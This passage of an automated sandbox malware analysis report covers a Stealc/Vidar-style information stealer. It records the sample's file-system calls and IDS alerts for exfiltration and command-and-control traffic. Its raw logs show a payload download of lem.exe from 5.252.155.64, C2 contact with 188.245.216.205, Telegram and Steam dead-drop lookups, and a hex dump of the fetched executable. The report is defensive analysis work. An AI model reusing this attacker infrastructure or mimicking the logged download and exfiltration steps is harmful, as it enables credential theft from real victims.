                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49789 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49892 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49902 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49921 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49954 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406301 FindFirstFileW,FindClose,14_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075DC54
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A087
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A1E2
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_0075E472
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_0076A570
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072C622 FindFirstFileExW,26_2_0072C622
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007666DC FindFirstFileW,FindNextFileW,FindClose,26_2_007666DC
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00767333 FindFirstFileW,FindClose,26_2_00767333
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_007673D4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075D921
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49933 -> 188.245.216.205:443
                    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49927 -> 188.245.216.205:443
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49939
                    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49945
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 06:09:31 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Fri, 27 Dec 2024 04:44:48 GMTETag: "136ffc-62a391f62da6d"Accept-Ranges: bytesContent-Length: 1273852Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 06 0e 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 16 00 00 04 00 00 48 b8 13 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 da 98 06 00 00 00 00 00 00 00 00 00 9c 47 13 00 60 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 da 98 06 00 00 00 10 00 00 9a 06 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 a0 16 00 00 10 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /lem.exe HTTP/1.1Host: 5.252.155.64Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: Joe Sandbox ViewIP Address: 18.165.220.66 18.165.220.66
                    Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49773 -> 5.252.155.64:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.252.155.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.252.155.64
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076D889 InternetReadFile,SetEvent,GetLastError,SetEvent,26_2_0076D889
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400728442_1ZZPG5YB8L69HFW32&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400728441_1SJIWICR800Z51YH3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414229_1P4RDVHBQE93FAZFW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414228_1EUMX2S6TUEXTBXLL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795017_1P2HE79XS2FOA94E1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795018_1H6ENBKGWI9ZKTUAB&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360172384_1T8ZHTG4V2CH7K983&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360172398_1SAKF1TLLO2IFUJXJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381876013_1OYVEM6EQRGLI15B8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381876014_1KDTTK12P9PNFN49Z&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433145_1P8I9JAN4TGEHJX5M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433144_1RLNQD8OFQA9LQ1KZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /lem.exe HTTP/1.1Host: 5.252.155.64Connection: Keep-Alive
                    Source: chrome.exe, 00000020.00000003.3176818731.00005B38031A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3176736724.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177071035.00005B38025B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                    Source: chrome.exe, 00000020.00000003.3176818731.00005B38031A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3176736724.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177071035.00005B38025B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) 